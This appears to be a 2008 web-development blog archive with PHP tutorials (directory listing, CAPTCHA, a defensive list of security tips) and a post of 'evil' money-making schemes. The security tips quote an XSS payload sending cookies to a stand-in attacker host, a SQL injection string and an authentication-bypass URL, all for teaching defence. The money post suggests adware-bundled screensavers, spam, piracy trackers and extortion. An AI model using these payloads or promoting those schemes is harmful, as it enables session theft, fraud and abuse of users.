
Archive for January, 2008

PHP Security Guide (XSS, Injection, CSRF and more).


Rob Miller wrote a really great article on PHP security. He makes a lot of good points and suggestions, with real-world examples and scenarios. Definitely worth reading. The article covers XSS, SQL injection and CSRF, among an array of other possible vulnerable avenues in PHP programming. Check it out if you ever do any kind of PHP programming and want to keep it safe.

Link: PHP Security Guide

302 Useful APIs.


Google, YouTube, Amazon, del.icio.us: all the big names release APIs for development and interaction with their services. It can be daunting trying to break into the external API scripting arena of programming. Here is a very long list of 302 useful APIs. Upon clicking on any of them, you will be taken to a page that lists all of the information about that individual API, along with a download link. Definitely worth checking out!

List:


PHP - Directory Listing


Just thought I'd end the night with a simple script. This PHP script will list all files, directories, and subdirectories under a given path, and will even make links out of them.

PHP:
  <?php
  // define the path to list (an absolute path on the server)
  $path = "/home/yoursite/public_html/whatever";

  // open the directory with opendir()
  $dir_handle = @opendir($path) or die("Unable to open $path");

  echo "Directory Listing of $path<br/>";

  // loop over every entry; compare against false so an entry named "0" does not end the loop early
  while (($file = readdir($dir_handle)) !== false)
  {
      // percent-encode spaces and other characters that are unsafe in a URL
      $file = rawurlencode($file);

      // rawurlencode() already turns spaces into %20 (urlencode() would give +); this replace is kept as a safety net
      $url = str_replace('+', '%20', $file);

      echo "<a href='" . $url . "'>" . $url . "</a><br/>";
  }

  // close the directory handle
  closedir($dir_handle);
  ?>

A Quick and Dirty CAPTCHA Using PHP and the GD Library.


If you're just starting to get into PHP you may be a bit confused about how the GD library works and how to use it for things such as a CAPTCHA. This is a very easy implementation of a CAPTCHA. It will help stop spammers and spam bots from abusing your form or spamming your server.

It won't, however, prevent the abuse noted in Jeff Atwood's post, but it will help.

So, let's say you have a public submission or contact form on your website, that looks somewhat like the following:

HTML:
  <form method="post"> Contact us:
  <textarea cols="30" rows="5" name="simple_contact"></textarea>
  <input value="Submit" type="submit" />
  </form>

We'll use a CAPTCHA to keep this form somewhat safe.

Obviously you need a PHP engine enabled for your Web server to execute PHP scripts, and GD (PHP graphics library) to generate the image. The solution below is tested for Apache (Windows and Unix), IIS (Windows), PHP-4, PHP-5, GD and GD2.

1) Make a PHP script (separate file captcha.php) which will generate the image:

PHP:
  <?php
  // the session must be started before $_SESSION can be used
  session_start();

  // tell browsers and proxies never to cache the image, so every request gets a fresh code
  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
  header("Cache-Control: no-store, no-cache, must-revalidate");
  header("Cache-Control: post-check=0, pre-check=0", false);
  header("Pragma: no-cache");

  // build a random string of digits and lowercase letters
  function _generateRandom($length=6)
  {
      $_rand_src = array(
          array(48,57)   // digits
        , array(97,122)  // lowercase chars
  //    , array(65,90)   // uppercase chars
      );
      srand((double) microtime() * 1000000);
      $random_string = "";
      for($i=0;$i<$length;$i++){
          $i1=rand(0,sizeof($_rand_src)-1);
          $random_string .= chr(rand($_rand_src[$i1][0],$_rand_src[$i1][1]));
      }
      return $random_string;
  }

  // load the background image captcha.jpg (must exist next to this script)
  $im = @imagecreatefromjpeg("captcha.jpg");
  // the real code: 3 black symbols, stored in the session for the check on submit
  $rand = _generateRandom(3);
  $_SESSION['captcha'] = $rand;
  ImageString($im, 5, 2, 2, $rand[0]." ".$rand[1]." ".$rand[2]." ", ImageColorAllocate($im, 0, 0, 0));
  // a second, red string interleaved with the black one as a decoy
  $rand = _generateRandom(3);
  ImageString($im, 5, 2, 2, " ".$rand[0]." ".$rand[1]." ".$rand[2], ImageColorAllocate($im, 255, 0, 0));
  Header('Content-type: image/jpeg');
  imagejpeg($im,NULL,100);
  ImageDestroy($im);
  ?>

2) Add the following line at the top of the page where you need to implement CAPTCHA:

PHP:

3) Add the following lines to check whether the CAPTCHA string entered by the visitor is valid, before the line where you process the submitted message:

PHP:
  <?php
  if($_SESSION["captcha"]==$_POST["captcha"])
  {
      // CAPTCHA is valid; process the message: save to database, send by e-mail ...
  }
  ?>

4) Finally, add the CAPTCHA to the form:

PHP:
  <form method="post">
  <table bgcolor="#cccccc">
  <tr>
  <th>Contact us (Post new message):</th>
  </tr>
  <tr>
  <td><textarea cols="30" rows="5" name="message"></textarea></td>
  </tr>
  <tr>
  <td align="center">CAPTCHA:
  (antispam code, 3 black symbols)
  <table>
  <tr>
  <td><img src="captcha.php" alt="captcha image" /></td>
  <td><input name="captcha" size="3" maxlength="3" type="text" /></td>
  </tr>
  </table>
  </td>
  </tr>
  <tr>
  <th align="center"><input value="Submit" type="submit" /></th>
  </tr>
  </table>
  </form>
  <?php
  if(isset($_POST["captcha"]))
  {
      if($_SESSION["captcha"]==$_POST["captcha"])
      {
          // CAPTCHA is valid; process the message: save to database, send by e-mail ...
          echo 'CAPTCHA is valid; process the message';
      }
      else
      {
          echo 'CAPTCHA is not valid; ignore submission';
      }
  }
  ?>
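As an added example (my own code, not the original post's), here is a hardened version of the step 3 check that a practitioner would want on a real form: it starts the session, treats a missing session or POST value as failure, lower-cases and pattern-checks the answer before a strict string comparison (loose == on numeric-looking strings such as "0e1" can match the wrong value), and discards the stored code after one check so a solved image cannot be replayed. The function name captcha_is_valid is mine; it assumes captcha.php stored the code in $_SESSION['captcha'] as above.

```php
<?php
// Hardened CAPTCHA check for the form above (added example, not the original post's code).
// Assumes captcha.php has stored the 3-character code in $_SESSION['captcha'].
session_start();

function captcha_is_valid(array $session, array $post)
{
    // No code issued yet, or nothing submitted: fail closed.
    if (!isset($session['captcha']) || !isset($post['captcha'])) {
        return false;
    }
    $expected = (string) $session['captcha'];
    $given    = trim((string) $post['captcha']);

    // The generator only emits digits and lowercase letters, so
    // normalize case rather than punish a user who typed capitals.
    $given = strtolower($given);

    // Reject anything that is not exactly 3 allowed characters before comparing.
    if (!preg_match('/^[a-z0-9]{3}$/', $given)) {
        return false;
    }

    // Strict comparison: loose == would treat "0e1" and "000" as equal (both numeric, both 0).
    return $given === $expected;
}

if (isset($_POST['captcha'])) {
    $ok = captcha_is_valid($_SESSION, $_POST);

    // Single use: whether the answer was right or wrong, throw the code away so the
    // same image cannot be solved once and then replayed for many submissions.
    unset($_SESSION['captcha']);

    if ($ok) {
        echo 'CAPTCHA is valid; process the message';
    } else {
        echo 'CAPTCHA is not valid; ignore submission (a new image is shown on reload)';
    }
}
?>
```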

There you go! A quick, and dirty captcha for easy implementation. Of course there are much more secure and stronger methods to achieve this feature, but this is just the quick and dirty.

Hope this helped.

Get Insight Into Digg’s Bury System With Ajaxonomy’s Bury Recorder.


David Hurth over at Ajaxonomy has created a pretty cool little web application. Here are the specifics:

If you have been using the popular service Digg you know that it is very easy to submit a story and to see it start to gain traction just to be buried into the dark abyss. What I find particularly frustrating is that you don't know how many people buried the story and the reason for the bury. If you have seen Digg Spy you have noticed that the application does show buries, but you can't just track data for a particular story.

After much frustration Ajaxonomy is now releasing a Bury Recorder application. How the application works is you take the story's URL (this is the URL of the page that the "more" link on the Digg upcoming/popular pages takes you to, or the page that clicking on the story title takes you to from your profile, i.e. http://digg.com/[story]) and put it into the application, and once you click "Watch for Buries" the application will start recording any buries that the story receives. This will allow you to see if your story had 100 diggs and 5 buries before it was permanently buried, or if it was more like 100 diggs and 300 buries. The idea is that you would submit a story and then have the recorder capture any buries from the time that you start the application watching for buries. You'll want to note that in this Beta 1.0 release you currently have to leave your machine on and the application open in order to make sure that it continues to capture buries.

Definitely worth checking out, a small program full of ingenuity. I'm fast becoming a regular reader over at Ajaxonomy. I suggest any JS/AJAX programmers do the same.

Link: Get Insight Into Digg's Bury System With Ajaxonomy's Bury Recorder.

AJAX IDE Development.


If AJAX has been defeating you and you want a better experience, you may want to try AJAX Webshop: it features an IDE and visual design tools, and allows beginners to develop rich web applications quickly. Let's look at some of its features:

Based on a standard component library, it allows an Ajax IDE in the rapid application development (RAD) pattern.

Integrated development and management tools are available: an easy-to-use visual Unified Modeling Language and visual IDE; a complete component and object-oriented development pattern.

Rich web component library.

Troubleshooting IntelliSense support, code editing support, project release and deployment support.

Java, PHP, C#, VB support.

Compatible with IE and Firefox.

Download: AJAX Workshop

Meta Keywords Tag 101: How To “Legally” Hide Words On Your Pages For Search Engines.


If there's anything I particularly hate when it comes to SEO, it's the meta keywords tag. I so wish it had never been invented. It's practically useless, yet people still obsess over it. In this article, I'll explain more about why you shouldn't worry about it except perhaps for misspellings, as well as which search engines support it.

The meta keywords tag is one of several of meta tags that you can insert into your web pages to provide search engines with information about your pages that isn't visible on the page itself. For example, my Meta Robots Tag 101: Blocking Spiders, Cached Pages & More article covers how you can use a different meta tag -- the meta robots tag -- to block pages from being indexed. Users don't see this information (unless they look at your source code), but search engines do.

I recently read an interesting article that I think may help some people out there with SEO concerns for their major sites and/or blogs. The above is a quote from the article. The link is below:

Link: Meta Keywords Tag 101: How To "Legally" Hide Words On Your Pages For Search Engines.

14 Security Tips For Developing With PHP and MySQL


PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL

I read about many of these points in books and tutorials, but I was rather lazy to think about many of them initially and learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP and MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess.

1. Do not trust user input

If you are expecting an integer, call intval() (or use a cast); if you don't expect a username to contain a dash (-), check it with strstr() and tell the user that the username is not valid.

Here is an example:

PHP:
  // cast to int first: whatever was in the query string, $post_id is now a plain integer
  $post_id = intval($_GET['post_id']);
  mysql_query("SELECT * FROM post WHERE id = $post_id");

Now $post_id is guaranteed to be an integer.

2. Validate user input on the server side

If you are validating user input with JavaScript, be sure to do it on the server side too, because to bypass your JavaScript validation a user just needs to turn JavaScript off.
JavaScript validation is only good for reducing server load.

3. Do not use user input directly in your SQL queries

Use mysql_real_escape_string() to escape the user input.
PHP.net recommends a function like this one (slightly different from the original):

PHP:
  function escape($values) {
      if(is_array($values)) {
          // escape every element of an array recursively (plain function, so no $this here)
          $values = array_map('escape', $values);
      } else {
          /* Quote if not integer (a leading zero means it is really a string, e.g. a zip code) */
          if ( !is_numeric($values) || $values[0] == '0' ) {
              $values = "'" . mysql_real_escape_string($values) . "'";
          }
      }
      return $values;
  }

Then you can use it like this:

PHP:
  $username = escape($_POST['username']);
  mysql_query("SELECT * FROM user WHERE username = $username"); /* escape() also adds the quotes around strings */

4. In your SQL queries don't put integers in quotes

For example, $id is supposed to be an integer:

PHP:
  $id = "0; DELETE FROM users";
  $id = mysql_real_escape_string($id); // still "0; DELETE FROM users" - mysql_real_escape_string() does not escape ;
  mysql_query("SELECT * FROM users WHERE id='$id'");

Note that using intval() would fix the problem here.
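As an added example, not from the original list: the lookups from tips 1, 3 and 4 written so the rules cannot be forgotten. An integer id goes through intval() and is never quoted, a string goes through the driver's escaping function and is then quoted, and the last function shows the same lookup as a mysqli prepared statement, where the value is bound separately from the SQL text and needs no escaping at all. The function names, the users table (integer id, string username) and the connection details are my assumptions; get_result() needs the mysqlnd driver.

```php
<?php
// Added example, not part of the original list. Assumes a `users` table with
// integer `id` and string `username` columns and a reachable MySQL server
// (hostname, credentials and database name below are placeholders).
$db = new mysqli('db-host.example', 'app_user', 'app_password', 'app_db');
if ($db->connect_error) {
    die('Database connection failed');
}

// Tip 1 + tip 4: an id is an integer, so make it one before it goes anywhere near SQL.
// intval("0; DELETE FROM users") is 0, and the integer is never put in quotes.
function find_user_by_id(mysqli $db, $raw_id)
{
    $id = intval($raw_id);
    $res = $db->query("SELECT id, username FROM users WHERE id = $id");
    return $res ? $res->fetch_assoc() : null;
}

// Tip 3: a string is escaped with the driver's escaping function and then quoted,
// so a name containing a quote (O'Brien) cannot terminate the literal early.
function find_user_by_name_escaped(mysqli $db, $raw_name)
{
    $name = "'" . $db->real_escape_string($raw_name) . "'";
    $res = $db->query("SELECT id, username FROM users WHERE username = $name");
    return $res ? $res->fetch_assoc() : null;
}

// The same lookup as a prepared statement: the SQL text is sent with a placeholder
// and the value is bound afterwards, so it can never change the query's structure.
function find_user_by_name_prepared(mysqli $db, $raw_name)
{
    $stmt = $db->prepare("SELECT id, username FROM users WHERE username = ?");
    $stmt->bind_param('s', $raw_name);   // 's' = string; use 'i' for an integer parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row;
}

// Usage with the hostile id from tip 4 and a legitimate name containing a quote:
// each call returns at most the one matching row (or null) and runs only a SELECT.
var_dump(find_user_by_id($db, "0; DELETE FROM users"));
var_dump(find_user_by_name_escaped($db, "O'Brien"));
var_dump(find_user_by_name_prepared($db, "O'Brien"));
?>
```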

5. Always escape the output

This will prevent XSS (Cross Site Scripting) attacks. Imagine you receive and save some data from a user and want to display it on a web page later (maybe his/her bio or username), and the user puts this bit of code in the input field along with his bio:

JAVASCRIPT:
  <script>alert('');</script>

If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:

JAVASCRIPT:
  <script>document.location.replace('http://attacker/?c='+document.cookie);</script>

With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.

When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');

6. When uploading files, validate the file mime type

If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.

One quick way is to check the file extension:

PHP:
  $valid_extensions = array('jpg', 'gif', 'png'); // ...

  $file_name  = basename($_FILES['userfile']['name']);
  $_file_name = explode('.', $file_name);
  // the extension is whatever follows the last dot; lower-case it so "photo.JPG" passes the whitelist
  $ext        = strtolower($_file_name[ count($_file_name) - 1 ]);

  if( !in_array($ext, $valid_extensions) ) {
      /* This file is invalid */
  }

Note that validating the extension is a very simple way, and not the best way, to validate file uploads, but it is effective,
simply because unless you have set your server to interpret .jpg files as PHP scripts you are fine.
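An added example (my own code, not from the original list) of the fuller check the heading asks for: besides the extension whitelist it inspects the actual bytes with getimagesize(), which fails for a PHP script renamed to .jpg or for a forged Content-Type, and it stores the file under a generated name so the uploader controls neither the path nor the final name. The function name, the form field userfile and the destination directory are assumptions; random_bytes() needs PHP 7 or later, and the directory should not be served as PHP.

```php
<?php
// Added example, not the original list's code. Assumes a form field named
// "userfile" and an upload directory outside the web root (placeholder path below).
function save_image_upload(array $file, $dest_dir)
{
    // extension whitelist mapped to the image type getimagesize() must report for it
    $valid_extensions = array('jpg' => IMAGETYPE_JPEG, 'gif' => IMAGETYPE_GIF, 'png' => IMAGETYPE_PNG);

    // Only accept files that PHP itself received through this request.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }

    // Extension whitelist, lower-cased so "photo.JPG" is accepted and "x.php" is not.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!isset($valid_extensions[$ext])) {
        return false;
    }

    // Content check: getimagesize() parses the image header, so a PHP script
    // renamed to .jpg (or a file with a forged Content-Type header) fails here.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== $valid_extensions[$ext]) {
        return false;   // not an image, or the bytes do not match the extension
    }

    // Never reuse the client-supplied name: generate one, so no traversal sequence or
    // double extension such as "name.php.jpg" reaches the disk.
    $new_name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dest_dir, '/') . '/' . $new_name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;
    }
    return $new_name;
}

if (isset($_FILES['userfile'])) {
    $stored = save_image_upload($_FILES['userfile'], '/var/uploads'); // placeholder directory
    echo $stored ? "Stored as $stored" : "Upload rejected";
}
?>
```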

7. If you are using 3rd party code libraries, be sure to keep them up to date

If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.

8. Give your database users just enough permissions

If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.

9. Do not allow hosts other than localhost to connect to your database

If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.

10. Your library file extensions should be PHP

.inc files will be served to the browser just like text files (unless your server is set up to interpret them as PHP scripts), so users will be able to see your messy code (kidding) and possibly find exploits or see your passwords etc.
Use extensions like config.inc.php, or put a .htaccess file in your include (templates, libs etc.) folders with this one line:

.htaccess (Apache):
  deny from all

11. Have register globals off or define your variables first

Register globals can be very dangerous, consider this bit of code:

PHP:
  if( user_logged_in() ) {
      $auth = true;
  }

  // $auth was never initialised, so with register_globals on a request parameter can set it
  if( $auth ) {
      /* Do some admin stuff */
  }

Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1

If you have register globals on and you can't turn it off for some reason, you can fix these issues by defining your variables first:

PHP:
  $auth = false;   // initialised here, so a request parameter can no longer supply it
  if( user_logged_in() ) {
      $auth = true;
  }

  if( $auth ) {
      /* Do some admin stuff */
  }

Defining your variables first is a good programming practice that I suggest you follow anyway.

12. Keep PHP itself up to date

Just take a look at www.php.net, read the release announcements, and note how many security issues are fixed in every release to understand why this is important.

13. Read security books

Always find new books about PHP security to read; you can start by reading the 4th book in the Learning PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.

14. Contribute to this list

Feel free to reply to this post and add to this list, it will be helpful for everyone!

If you find this useful, please Digg and/or comment!

All The RSS Icons You’ll Ever Need


11 Evil Ways To Make Money With Technology.


Everyone loves money, but making it online isn’t all that easy if you have morals. If you don’t, this article will give you some great tips to make quick money online. Before I start I need to state that I don’t condone any of these methods, and they are used at your own risk. I don’t take responsibility for any damage you may do.

  1. Set up a Proxy Server

    Set up a web site that serves as a proxy, so people can browse blocked sites at work, and kids can browse blocked sites at school. Kids want nothing more than to have access to all their favorite game and social networking sites, and many of them know about proxies. A common script is CGI Proxy; it is great because it allows people to use sites that require a log in. Here is an auto installer for it: CGI Proxy Auto installer. You will need to have an ad, probably an Adsense block in the header, so ads are shown when people browse. The main drawback of this method is that if your proxy site does become popular it will probably be blocked by school Internet servers. So if you wanted to try this method out, I wouldn’t shell out any money on a domain name, or expensive hosting.

  2. Create a Screensaver with Embedded Adware

    Create a screen saver that bundles adware (Zangocash), so whenever someone installs the Screensaver, you make affiliate money. You need to upload your Screensaver to as many Screensaver sites as possible. For a full write up on the details of this method, read: Blue Hat SEO’s How To Make a $100 per Day

  3. Dodgy P2P Sports Links

    Set up a blogger account using an anonymous email account, then use it to share p2p links to live sporting events. I have seen people earn great money fast using it. It works particularly well for sharing live Cricket using the software Sopcast. The Indian Sub Continent love p2p links for cricket matches, particularly when there are big games involving India, Bangladesh, Pakistan or Sri Lanka. You can use Sopcast to embed a p2p media player showing the channel with the cricket on it, then surround it with lots of Adsense ads. I have never seen Google remove any of these blogs, nor have I heard of any Adsense account being suspended for doing this. Someone tried to sell a successful attempt using this technique on Sitepoint, and he showed his earnings for the period of the cricket world cup of $1200 US. So timing is key here!

  4. Online Poker

    I love poker, and playing online, I cashed out $800 for about 4 months of on and off play, which is more money than I have made through anything else online. The key to making money with online poker when you are starting out is to take advantage of the various signup offers and bonuses. The idea is that poker rooms will give you a cash incentive bonus, where if you play a certain amount of hands they will give you free cash. In their minds you are a beginner so you will probably make them more money in the process, but if you learn to play tight, and only play very good starting hands, and fold the rest you can clear good money with only a small amount of skill. As playing tight requires a lot of patience, once you get the hang of it you can speed things up by playing 3-4 tables at once. Do some research for free poker bonuses, and you will find plenty of sites and forums with advice to get you started in the evil world of online gambling.

  5. A MySpace or Facebook Resource Site

    Levi from Internet Marketing Sucks has a great plan to make money by setting up a MySpace resource site. He even provides a script and instructions that will help you on your way. It’s not particularly evil, and rather crafty, but it makes the list anyway.

  6. Set Up a Private Torrent Site and Tracker

    Recent news about raids on the owner of oink’s house would suggest that this is a very risky business, especially if you live in a country that will police such activities. The torrent scene is massive, as such there is great money to be made by those that are crazy enough. The idea is to make it private, then set up a scheme where you have “donations” to pay for your server, and donators get extra upload credit. Also have lots of pay per click advertising and you will be away, making plenty of cash. But I would make sure your cash heap is large enough to fight a legal battle if you get caught.

  7. Search Engine Arbitrage

    Arbitrage is where you buy something for a certain value, with the intention of selling it on for a greater value. You can use search engine marketing to buy traffic from one network, Google Adwords, then send that traffic to a landing page that has advertising on it for another network, Yahoo. The idea is to create a landing page with very little actual content, and format it so that ads appear to be content. Then your unsuspecting visitor may click ads thinking it is content. You will need to test different networks and keywords, but you can make good money using this method. It is purely evil though as it fills the net with rubbish sites.

  8. Set Up A Network of Scraper Sites

    A scraper site is a web site that pulls content from other sources, for example you could have a site that pulls the top 10 stories from the rss feeds of digg, reddit, delicious. It’s probably a good idea to use keywords to narrow down your results to a certain topic. Then plant lots of advertising around the content, especially Adsense. As you don’t have any real content you are never likely to get many inbound links, so to rank, you will need to build up a network of sites, then link them to each other to help your sites rank in search engines. You could combine this method with 7 to create some seriously evil sites.

  9. Volunteer At a Directory Site Like DMOZ

    Then take bribes to list certain sites. Or email people who are on the list and tell them that if they don’t pay you, you will boot them off the directory. People do this, believe me. Read about the DMOZ Shoemoney Extortion.

  10. Become a Spam Marketer

    Everybody hates spam, but some people obviously open it from time to time. Get creative with your subject lines, and spam away. It is illegal in some countries so be careful. Basically the idea is to find some pay per click advertising scheme that allows you to advertise via email, or include a link from the email that has advertising on it. You will want to find some tools to automate this process, but I’m not telling you where to find them. Another form of Spam that seems to be very popular is Wordpress spam. All you need to do is set up a landing page on a dodgy domain that sells dodgy pharmaceutical products or any form of ppc or ppa advertising and spam away, automating comment posting on blogs that link to your landing page. It’s surprising how many sites don’t block spam properly.

  11. Start Your Own Porn Site

    Starting your own porn site is not hard, if you're using unique, authentic content ;). Start one, a niche or category generally helps. Generate content quickly, and post often. Good site design, fair price, and you'll bring in cash quickly. Practically from doing nothing but burning calories at that!

    I know most of this stuff is pure evil, but people actually make good money using these techniques.

11 Flaws, And Thoughts On The Mac Book Air.


So Apple have announce the Ma